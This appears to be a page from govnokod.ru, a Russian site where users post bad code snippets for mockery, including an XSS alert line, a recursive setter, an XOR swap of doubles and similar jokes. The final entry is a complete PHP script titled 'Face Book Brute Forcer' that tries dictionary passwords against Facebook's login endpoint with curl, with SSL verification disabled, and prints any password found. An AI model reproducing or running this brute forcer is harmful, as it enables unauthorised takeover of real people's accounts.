- 1
echo "<script>alert(/xss/)</script>";
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+140
echo "<script>alert(/xss/)</script>";
=\
+92.2
UniqueNamesTableUtils.putPortletRequestIntoResourceRecordLazyLoadAdminTableModelInSession(portletrequest);
Это IBM WebSphere Portal 6.0 - код является частью портлета, отвечающего за управление объектами портала (административный интерфейс).
+118.6
boolean b;
// ....
switch (b)
{
case true: // ....
case false: // .....
default: // (!) тут был код, и он отличался от предыдущих двух пунктов!
}
автор кода - какой-то индус. это не копипаст, но смысл передан верно
+145.5
if ($ajax_teamID == $value['team2ID']){
$visitors_team = $Bet->CBetType[$Bet->betTypeIndex]->CTeam->getOne($value['team2ID'])->title;
$home_team = $Bet->CBetType[$Bet->betTypeIndex]->CTeam->getOne($value['team1ID'])->title;
} else {
$home_team = $Bet->CBetType[$Bet->betTypeIndex]->CTeam->getOne($value['team1ID'])->title;
$visitors_team = $Bet->CBetType[$Bet->betTypeIndex]->CTeam->getOne($value['team2ID'])->title;
}
Не делайте так.
+140
<?
$HisName="Попов Евгений Михайлович";
?>
Ну кто не знает его говнокода?
+215
<?php
/**
* Эмулятор GPRS соединения...
* @todo Убрать на продакшене!!!
*/
sleep(4);
//
...
Не скажу что это говнокод, но улбынуло =)
+154.3
double a, b;
...
*((DWORD*)&a) ^= *((DWORD*)&b);
*((DWORD*)&b) ^= *((DWORD*)&a);
*((DWORD*)&a) ^= *((DWORD*)&b);
*((DWORD*)&a + 1) ^= *((DWORD*)&b + 1);
*((DWORD*)&b + 1) ^= *((DWORD*)&a + 1);
*((DWORD*)&a + 1) ^= *((DWORD*)&b + 1);
Cпособ обменять значения двух переменных типа double;
+160.1
class Company extends BaseCompany {
//...
public function setName($v){
$this->setName(String::mb_ucfirst($v));
}
//...
}
Мегаметодика переопределения сеттеров. Symfony, Propel.
+156.7
<?php
$mov = new ffmpeg_movie ( '1.avi' );
$frame = $mov -> GetFrame ( 26 ):
$gd = ToGd ( $frame );
header ( "Content-type: image/gif" );
imageGif ( $gd );
function ToGd ( $frame )
{
RETURN $frame -> toGDimage ();
}
?>
Говнокод? =)
+19.2
<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>